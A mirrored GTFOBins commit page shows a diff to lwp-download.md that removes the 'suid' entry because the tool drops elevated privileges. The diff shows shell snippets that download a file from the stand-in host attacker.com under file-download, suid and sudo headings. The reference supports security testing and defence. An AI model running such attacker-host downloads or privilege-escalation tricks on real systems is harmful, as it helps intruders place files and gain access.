1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-04-17 12:35:37 +02:00

Update lwp-download.md

lwp-download drop the elevated privileges
This commit is contained in:
LinuxSploit 2021-04-16 06:36:34 -04:00 committed by Andrea Cardaci
parent 494ea89794
commit 313a49d9f7

@ -6,11 +6,6 @@ functions:
URL=http://attacker.com/file_to_get
LFILE=file_to_save
lwp-download $URL $LFILE
suid:
- code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
./lwp-download $URL $LFILE
sudo:
- code: |
URL=http://attacker.com/file_to_get